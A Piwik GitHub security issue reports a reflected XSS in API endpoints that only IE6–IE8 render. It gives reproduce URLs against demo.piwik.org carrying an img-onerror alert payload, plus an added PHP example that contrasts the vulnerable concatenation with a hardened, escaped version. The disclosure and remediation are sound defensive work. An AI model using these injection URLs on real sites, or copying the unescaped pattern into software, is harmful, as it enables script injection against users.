xss affecting IE6, IE7 and IE8 #6053
Labels: Bug, c: Security, Major
Here is the report to our security team
Reproduce:
http://demo.piwik.org/index.php/.html?date=yesterday&module=API&format=json&method=SitesManager.getImageTrackingCode&idSite=1&period=day&piwikUrl=%3Cimg%20src%3dx%20onerror%3dalert('XSS')%3E&actionName=&token_auth=12121
Also http://demo.piwik.org/index.php/.html?date=yesterday&module=API&format=json&method=SitesManager.getImageTrackingCode&idSite="><img%20src=x%20onerror=alert('XSS')>&period=day&piwikUrl=1&actionName=&token_auth=12121
Also http://demo.piwik.org/index.php/.html?module=API&method=UserCountry.getLocationFromIP&ip="><image%20src=x%20onerror=alert('XSS')>&format=JSON&
Double-check whether you have filtered the parameters customCampaignKeywordParam and customCampaignNameQueryParam.
Just make a request to your demo website under IE7 or IE8 (I tested on IE 8.0.6001.17184); you will find that the injected JavaScript code
<img src=x onerror=alert('XSS')>
will be executed. You will be unable to exploit this vulnerability in a modern browser because the content type of the response body is application/json, and modern browsers will not render this content type. That is why you can only exploit it in IE6, IE7 and IE8 (some versions).

Details
If you check the source code, it is basically caused by the following code in API.php: https://github.com/piwik/piwik/blob/8d1f1b39f26bc00394af5ac220b6bd97ca89537f/plugins/SitesManager/API.php#L129
There is no check or validation of the parameter piwikUrl to filter malicious characters. This vulnerability has been present since Piwik 2.2.0. Please let me know. The attachment is a screenshot of the exploitation against the demo.piwik.org website in IE7.
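The mechanism described in the report, as an added example that is not Piwik's own code: a caller-supplied piwikUrl is concatenated into an HTML image-tracking snippet and returned inside a JSON body. json_encode() only escapes quotes, backslashes and control characters, so an `<img ... onerror=...>` value survives intact, and a browser that ignores the application/json Content-Type and sniffs the body as HTML (old IE) renders the tag. The hardened variant validates the URL, HTML-escapes what it echoes, has json_encode() hex-escape HTML metacharacters, and sends X-Content-Type-Options: nosniff. The function names, the `analytics.example.com` URL and the response shape are assumptions for illustration; the idSite parameter is typed as int here, which also covers the idSite injection shown in the second reproduce URL.

```php
<?php
// Added example, not Piwik's own code. Function names and the response shape
// are hypothetical; only the payload is taken from the report above.

// Vulnerable: piwikUrl is concatenated unescaped into the HTML snippet.
// json_encode() leaves < > ' untouched, so the tag reaches the response body
// verbatim and a MIME-sniffing browser (IE6/7/8) can render it as HTML.
function getImageTrackingCodeVulnerable(string $piwikUrl, int $idSite): string
{
    $img = '<img src="' . $piwikUrl . '/piwik.php?idsite=' . $idSite
         . '&rec=1" style="border:0" alt="" />';
    return json_encode(['value' => $img]);
}

// Hardened:
//  1. accept only a plain http(s) URL with no markup characters;
//  2. HTML-escape the value before it is placed in the snippet;
//  3. have json_encode() hex-escape < > & ' " so no HTML tag can appear in the
//     body even if a future code path forgets step 2.
function getImageTrackingCodeHardened(string $piwikUrl, int $idSite): string
{
    $piwikUrl = trim($piwikUrl);
    if (filter_var($piwikUrl, FILTER_VALIDATE_URL) === false
        || !preg_match('#^https?://#i', $piwikUrl)
        || preg_match('/[<>"\'\s]/', $piwikUrl)) {
        throw new InvalidArgumentException('piwikUrl must be a plain http(s) URL');
    }
    $safeUrl = htmlspecialchars(rtrim($piwikUrl, '/'), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $img = '<img src="' . $safeUrl . '/piwik.php?idsite=' . $idSite
         . '&amp;rec=1" style="border:0" alt="" />';
    return json_encode(['value' => $img],
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// The endpoint should emit the body with an explicit content type and nosniff,
// which stops IE8+ and modern browsers from guessing the type from the bytes.
function emitJson(string $body): void
{
    header('Content-Type: application/json; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    echo $body;
}

// Demo on the payload from the report (constructed input, run from the CLI).
$payload = "<img src=x onerror=alert('XSS')>";
echo getImageTrackingCodeVulnerable($payload, 1), "\n";   // tag appears verbatim in the JSON
try {
    getImageTrackingCodeHardened($payload, 1);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";              // payload is refused outright
}
echo getImageTrackingCodeHardened('https://analytics.example.com', 1), "\n";
// every < > & " ' in the legitimate snippet is emitted as \u003C, \u003E, ...
```

Note that X-Content-Type-Options: nosniff was introduced with IE8, so it does nothing for the IE6 and IE7 targets named in the report; the output escaping and input validation are the controls that close the issue there, and the header is defence in depth for everything newer.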
Note from Piwik security team
We generally do not communicate via issues on XSS issues in Piwik (some have called it "security by obscurity", but we definitely disagree with that). Because this issue affects only IE6, IE7 and IE8, it has limited impact, so we decided to track it in a GitHub issue.